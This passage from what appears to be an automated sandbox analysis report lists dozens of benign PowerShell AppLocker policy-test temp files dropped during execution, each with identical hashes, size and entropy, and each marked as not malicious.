Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e5dj5f2c.lds.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ei5vlshl.fkt.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_etthpquw.gkj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fidzio4s.0pm.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gtmql0t2.dtb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hahrwxwq.wqs.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_haki3tqg.2s4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_he3g1ykn.tzz.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hfc2ah4g.tfn.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hg2zkjsm.cp4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ibsp5wcb.l4t.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_if1uggtu.5mv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_igwzhfxl.awi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ioe23vxr.ceg.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kj0aitza.41v.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kmkwh3it.a4j.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbq4cytg.ke0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lm0cjbzo.e2x.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lmxnjwzs.uur.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lqgmce5f.354.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mdcpfzob.4ck.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mp5bpxii.isc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n1lsob1p.ad2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvghu4du.3kq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o0pfjy3n.3mb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_obf2sw3c.kkr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ozsgw1ry.j1x.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ptznubvr.eoa.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4c15hod.dao.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_shalsoby.onq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_soppudy1.eqx.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t52zqfin.3r1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tpo4kcjs.tbh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tt2xsxh0.ljl.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
